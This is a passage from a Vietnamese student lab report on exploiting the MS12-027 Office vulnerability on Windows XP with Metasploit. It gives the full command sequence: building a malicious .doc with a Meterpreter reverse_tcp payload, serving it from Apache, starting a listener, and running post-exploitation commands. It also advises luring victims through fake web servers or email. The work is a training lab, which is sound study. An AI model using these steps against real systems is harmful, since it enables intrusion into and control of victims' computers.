4. Xâm nhập và khai thác Windows XP
4.4 Khai thác lỗ hỏng Ms12-027
Mô tả:
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, …) máy nạn nhân đang sử dụng Microsoft Office 2007 (no-SP/SP1/SP2/SP3) trên Windows (XP SP3 / 7 SP1) English là máy nạn nhân sẽ bị “nhiễm độc”.
Mô hình bài Lab
Máy Hacker: Hệ điều hành: Sử dụng Backtrack 5 IP: 192.168.119.132 Máy nạn nhân: Hệ điều hành: Sử dụng Windows XP IP: 192.168.119.129 Cách khai thác:
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf msf > search ms12_027
System Hacking Athena Center
SVTH: Huỳnh Dương Khang Trang 35
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof Gõ lệnh show options để thấy những option của lỗi
msf exploit(ms12_027_mscomctl_bof) > show options
Ở đây ta thấy bắt buộc phải tạo FILENAME Lần lượt gõ các lệnh:
msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc
Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích)
msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132
Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack. msf exploit(ms12_027_mscomctl_bof) > exploit
Gõ lệnh exploit để thực thi
msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc
/root/Desktop
SVTH: Huỳnh Dương Khang Trang 36 Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một Webserver để nạn nhân truy cập vào. Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta chỉ việc chạy.
Upload file “filemadoc.doc” lên Webserver bằng cách đưa nó vào thư mục “/var/www” Start Webserver ảo bằng lệnh
root@bt:~# service apache2 start
* Starting web server apache2 [ OK ] Tạo ra một trình lắng nghe
msf exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.119.132
System Hacking Athena Center
SVTH: Huỳnh Dương Khang Trang 37
Giờ ta qua máy nạn nhân truy cập vào WEBSERVER ta đã dựng và tải file “filemadoc.doc” về.
Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào.
SVTH: Huỳnh Dương Khang Trang 38 Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1040
Giờ ta có thể khai thác được máy nạn nhân
Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã hoàn toàn kiểm xoát được máy nạn nhân